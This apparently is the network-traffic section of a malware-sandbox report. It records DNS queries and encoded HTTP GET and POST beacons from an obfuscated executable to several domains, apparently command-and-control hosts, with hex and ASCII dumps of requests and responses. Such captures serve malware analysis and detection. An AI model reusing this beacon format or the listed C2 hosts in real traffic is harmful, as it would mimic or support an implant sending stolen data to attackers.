                                                Dec 17, 2024 03:42:21.676400900 CET4998080192.168.2.518.166.177.211
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 03:40:52.753487110 CET | 52391 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:40:53.204112053 CET | 53 | 52391 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 03:41:10.052181959 CET | 63990 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:41:10.574491978 CET | 53 | 63990 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 03:41:25.005884886 CET | 58020 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:41:25.547740936 CET | 53 | 58020 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 03:41:39.802359104 CET | 51463 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:41:40.799827099 CET | 51463 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:41:40.871130943 CET | 53 | 51463 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 03:41:41.025144100 CET | 53 | 51463 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 03:41:55.382311106 CET | 63398 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:41:55.969944000 CET | 53 | 63398 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 03:42:10.444118023 CET | 63004 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:42:11.459353924 CET | 63004 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 03:42:11.641071081 CET | 53 | 63004 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 03:42:11.684582949 CET | 53 | 63004 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 03:40:52.753487110 CET | 192.168.2.5 | 1.1.1.1 | 0x90c1 | Standard query (0) | www.northidahoscans.online | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:10.052181959 CET | 192.168.2.5 | 1.1.1.1 | 0x69a8 | Standard query (0) | www.brickhills.site | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:25.005884886 CET | 192.168.2.5 | 1.1.1.1 | 0xa80d | Standard query (0) | www.pin-ballerz.net | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:39.802359104 CET | 192.168.2.5 | 1.1.1.1 | 0x4d33 | Standard query (0) | www.allstary.top | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:40.799827099 CET | 192.168.2.5 | 1.1.1.1 | 0x4d33 | Standard query (0) | www.allstary.top | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:55.382311106 CET | 192.168.2.5 | 1.1.1.1 | 0xd2d2 | Standard query (0) | www.waytoocool.life | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:42:10.444118023 CET | 192.168.2.5 | 1.1.1.1 | 0xf526 | Standard query (0) | www.timai.shop | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:42:11.459353924 CET | 192.168.2.5 | 1.1.1.1 | 0xf526 | Standard query (0) | www.timai.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 03:40:53.204112053 CET | 1.1.1.1 | 192.168.2.5 | 0x90c1 | No error (0) | www.northidahoscans.online | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:10.574491978 CET | 1.1.1.1 | 192.168.2.5 | 0x69a8 | No error (0) | www.brickhills.site | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:25.547740936 CET | 1.1.1.1 | 192.168.2.5 | 0xa80d | No error (0) | www.pin-ballerz.net | pin-ballerz.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 03:41:25.547740936 CET | 1.1.1.1 | 192.168.2.5 | 0xa80d | No error (0) | pin-ballerz.net | | 199.15.251.162 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:40.871130943 CET | 1.1.1.1 | 192.168.2.5 | 0x4d33 | No error (0) | www.allstary.top | | 199.193.6.134 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:41.025144100 CET | 1.1.1.1 | 192.168.2.5 | 0x4d33 | No error (0) | www.allstary.top | | 199.193.6.134 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:41:55.969944000 CET | 1.1.1.1 | 192.168.2.5 | 0xd2d2 | No error (0) | www.waytoocool.life | | 52.60.87.163 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:42:11.641071081 CET | 1.1.1.1 | 192.168.2.5 | 0xf526 | No error (0) | www.timai.shop | just-do-public-0526-cpdhe.jiexi-010.top | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 03:42:11.641071081 CET | 1.1.1.1 | 192.168.2.5 | 0xf526 | No error (0) | just-do-public-0526-cpdhe.jiexi-010.top | | 18.166.177.211 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 03:42:11.684582949 CET | 1.1.1.1 | 192.168.2.5 | 0xf526 | No error (0) | www.timai.shop | just-do-public-0526-cpdhe.jiexi-010.top | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 03:42:11.684582949 CET | 1.1.1.1 | 192.168.2.5 | 0xf526 | No error (0) | just-do-public-0526-cpdhe.jiexi-010.top | | 18.166.177.211 | A (IP address) | IN (0x0001) | false
• www.northidahoscans.online
• www.brickhills.site
• www.pin-ballerz.net
• www.allstary.top
• www.waytoocool.life
• www.timai.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49764 | 208.91.197.27 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 03:40:53.342633963 CET | 395 | OUT | GET /lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtV HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.northidahoscans.online
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
Dec 17, 2024 03:40:55.006685972 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 02:40:54 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
Set-Cookie: vsid=904vr48194885448939503; expires=Sun, 16-Dec-2029 02:40:54 GMT; Max-Age=157680000; path=/; domain=www.northidahoscans.online; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_k/pYroBFreHj3RjKc85enyaL7PjGUHs3IMcCVszmvyaeb/C3C+Z263Qg9qa4uLfp04Lvk7ju2GOJ3Fmv5SUR2A==
Content-Length: 2650
Content-Type: text/html; charset=UTF-8
Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 6b 2f 70 59 72 6f 42 46 72 65 48 6a 33 52 6a 4b 63 38 35 65 6e 79 61 4c 37 50 6a 47 55 48 73 33 49 4d 63 43 56 73 7a 6d 76 79 61 65 62 2f 43 33 43 2b 5a 32 36 33 51 67 39 71 61 34 75 4c 66 70 30 34 4c 76 6b 37 6a
                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_k/pYroBFreHj3RjKc85enyaL7PjGUHs3IMcCVszmvyaeb/C3C+Z263Qg9qa4uLfp04Lvk7j
Dec 17, 2024 03:40:55.006721973 CET | 1236 | IN | Data Raw: 75 32 47 4f 4a 33 46 6d 76 35 53 55 52 32 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69
Data Ascii: u2GOJ3Fmv5SUR2A=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.northidahoscans.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.northidahoscans.online/px.js
Dec 17, 2024 03:40:55.006757975 CET | 1174 | IN | Data Raw: 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20
Data Ascii: </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49805 | 103.224.182.242 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 03:41:10.722001076 CET | 649 | OUT | POST /q6c0/ HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Connection: close
Cache-Control: max-age=0
Host: www.brickhills.site
Origin: http://www.brickhills.site
Referer: http://www.brickhills.site/q6c0/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 4f 50 41 54 45 68 6c 45 44 45 63 74 70 6f 69 4c 2b 66 63 72 41 2f 42 6e 43 45 53 63 64 55 67 49 39 39 32 33 49 66 2f 4a 4f 2b 74 4f 32 69 63 7a 68 47 61 73 39 6f 70 76 38 4b 70 2b 52 51 4f 4e 78 66 6a 53 71 4e 37 34 6d 6d 65 38 48 56 67 49 6f 6a 47 4d 43 56 49 6b 2b 6a 41 79 2b 66 47 75 4e 55 6c 6b 2f 6c 6a 6f 71 6c 33 6c 58 2b 4c 7a 43 37 46 45 5a 70 74 2b 4f 37 41 6d 4f 4c 69 71 4c 4e 46 4b 58 71 51 74 4c 76 33 57 4b 66 33 4a 4a 65 56 6f 57 41 38 78 6f 6b 64 41 4a 5a 66 4d 2f 52 5a 63 4e 72 79 38 74 35 4e 67 6d 69 2b 31 6a 54 38 6a 31 4e 35 44 4f 6a 62 4c 37 38 38 2b 4f 53 53 58 67 30 51 3d
                                                Data Ascii: -V8=OPATEhlEDEctpoiL+fcrA/BnCEScdUgI9923If/JO+tO2iczhGas9opv8Kp+RQONxfjSqN74mme8HVgIojGMCVIk+jAy+fGuNUlk/ljoql3lX+LzC7FEZpt+O7AmOLiqLNFKXqQtLv3WKf3JJeVoWA8xokdAJZfM/RZcNry8t5Ngmi+1jT8j1N5DOjbL788+OSSXg0Q=
Dec 17, 2024 03:41:11.932759047 CET | 874 | IN | HTTP/1.1 200 OK
date: Tue, 17 Dec 2024 02:41:11 GMT
server: Apache
set-cookie: __tad=1734403271.6175629; expires=Fri, 15-Dec-2034 02:41:11 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 579
content-type: text/html; charset=UTF-8
connection: close
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49812 | 103.224.182.242 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 03:41:13.387609005 CET | 669 | OUT | POST /q6c0/ HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
Connection: close
Cache-Control: max-age=0
Host: www.brickhills.site
Origin: http://www.brickhills.site
Referer: http://www.brickhills.site/q6c0/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 4f 50 41 54 45 68 6c 45 44 45 63 74 34 38 65 4c 38 38 6b 72 48 66 42 67 47 30 53 63 47 6b 67 55 39 39 79 33 49 64 54 5a 4e 4d 35 4f 31 47 59 7a 7a 55 79 73 2b 6f 70 76 76 4b 70 37 56 51 4f 57 78 66 76 77 71 49 37 34 6d 6d 36 38 48 51 63 49 6f 30 53 50 54 56 49 6d 6d 54 41 38 7a 2f 47 75 4e 55 6c 6b 2f 6c 33 47 71 6c 76 6c 58 75 37 7a 59 65 78 48 51 4a 74 35 59 72 41 6d 5a 62 69 75 4c 4e 46 53 58 6f 30 48 4c 73 66 57 4b 64 76 4a 49 50 56 6e 42 77 38 2f 33 30 63 32 43 62 4f 69 36 54 46 44 4a 36 6d 31 31 4a 46 76 6e 55 50 66 35 78 30 4c 6d 74 56 37 65 77 54 38 71 4d 64 58 55 78 43 6e 2b 6a 48 64 70 59 75 4d 45 39 56 4d 48 30 55 6f 51 35 4b 62 4a 77 6d 61
                                                Data Ascii: -V8=OPATEhlEDEct48eL88krHfBgG0ScGkgU99y3IdTZNM5O1GYzzUys+opvvKp7VQOWxfvwqI74mm68HQcIo0SPTVImmTA8z/GuNUlk/l3GqlvlXu7zYexHQJt5YrAmZbiuLNFSXo0HLsfWKdvJIPVnBw8/30c2CbOi6TFDJ6m11JFvnUPf5x0LmtV7ewT8qMdXUxCn+jHdpYuME9VMH0UoQ5KbJwma
                                                Dec 17, 2024 03:41:14.610407114 CET | 874 | IN | HTTP/1.1 200 OK
                                                date: Tue, 17 Dec 2024 02:41:14 GMT
                                                server: Apache
                                                set-cookie: __tad=1734403274.7988264; expires=Fri, 15-Dec-2034 02:41:14 GMT; Max-Age=315360000
                                                vary: Accept-Encoding
                                                content-encoding: gzip
                                                content-length: 579
                                                content-type: text/html; charset=UTF-8
                                                connection: close
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.5 | 49818 | 103.224.182.242 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:16.060264111 CET | 1686 | OUT | POST /q6c0/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.brickhills.site
                                                Origin: http://www.brickhills.site
                                                Referer: http://www.brickhills.site/q6c0/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 4f 50 41 54 45 68 6c 45 44 45 63 74 34 38 65 4c 38 38 6b 72 48 66 42 67 47 30 53 63 47 6b 67 55 39 39 79 33 49 64 54 5a 4e 4d 68 4f 32 7a 4d 7a 68 6c 79 73 2f 6f 70 76 73 4b 70 36 56 51 4f 62 78 62 44 30 71 49 2f 43 6d 6b 79 38 48 31 51 49 34 51 2b 50 61 56 49 6d 36 6a 41 39 2b 66 48 30 4e 58 64 67 2f 6c 6e 47 71 6c 76 6c 58 74 6a 7a 4f 62 46 48 53 4a 74 2b 4f 37 42 79 4f 4c 69 47 4c 4e 64 6f 58 6f 77 39 4c 38 2f 57 4b 39 2f 4a 4f 39 74 6e 44 51 38 71 32 30 63 2b 43 62 43 68 36 54 5a 48 4a 37 6a 6f 31 4c 56 76 71 54 6d 35 70 53 4d 77 39 4e 52 49 56 57 37 6a 72 4d 52 4e 66 51 33 57 78 69 54 54 32 37 4b 50 4b 4e 78 78 54 77 46 44 4c 2b 47 30 4a 30 7a 54 74 57 4c 2f 42 6f 57 30 53 4f 30 74 33 52 77 45 6f 37 73 47 33 43 61 76 6f 43 68 75 74 54 32 69 4d 56 51 53 51 43 51 30 63 72 39 37 48 4d 72 4f 42 4f 34 70 6b 37 6b 43 58 6a 66 74 6e 43 2b 67 47 79 4b 4a 73 64 44 65 32 49 35 33 33 53 49 4e 2f 4e 2f 4a 36 46 45 65 73 35 75 72 4d 51 55 74 64 4b 34 46 70 4c 41 45 42 34 78 4a 50 7a 64 4e 73 53 [TRUNCATED]
                                                Data Ascii: -V8= [TRUNCATED]
                                                Dec 17, 2024 03:41:17.322793961 CET | 874 | IN | HTTP/1.1 200 OK
                                                date: Tue, 17 Dec 2024 02:41:17 GMT
                                                server: Apache
                                                set-cookie: __tad=1734403277.4596934; expires=Fri, 15-Dec-2034 02:41:17 GMT; Max-Age=315360000
                                                vary: Accept-Encoding
                                                content-encoding: gzip
                                                content-length: 579
                                                content-type: text/html; charset=UTF-8
                                                connection: close
                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 [TRUNCATED]
                                                Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.5 | 49825 | 103.224.182.242 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:18.727762938 CET | 388 | OUT | GET /q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.brickhills.site
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:41:19.988640070 CET | 1236 | IN | HTTP/1.1 200 OK
                                                date: Tue, 17 Dec 2024 02:41:19 GMT
                                                server: Apache
                                                set-cookie: __tad=1734403279.1270829; expires=Fri, 15-Dec-2034 02:41:19 GMT; Max-Age=315360000
                                                vary: Accept-Encoding
                                                content-length: 1537
                                                content-type: text/html; charset=UTF-8
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 2f 71 36 63 30 2f 3f 2d 56 38 3d 44 4e 6f 7a 48 58 5a 52 48 77 4d 6f 70 2b 57 42 30 71 77 66 42 4b 70 78 66 45 48 2b 65 6a 6f 54 79 4b 79 37 45 4f 54 58 4d 4e 52 58 31 78 59 50 6a 52 47 4f 77 34 4a 41 6a 34 70 65 66 77 57 41 78 66 53 30 71 2b 50 44 6b 48 33 37 50 51 4d 6c 78 79 75 56 44 6e 6f 70 33 47 4d 4e 38 63 48 2f 55 58 52 71 35 58 44 7a 72 57 79 48 4f 35 32 4f 4a 74 68 6d 51 59 5a 4d 56 37 67 6d 55 4c 44 36 [TRUNCATED]
                                                Data Ascii: <html><head><title>brickhills.site</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><bod
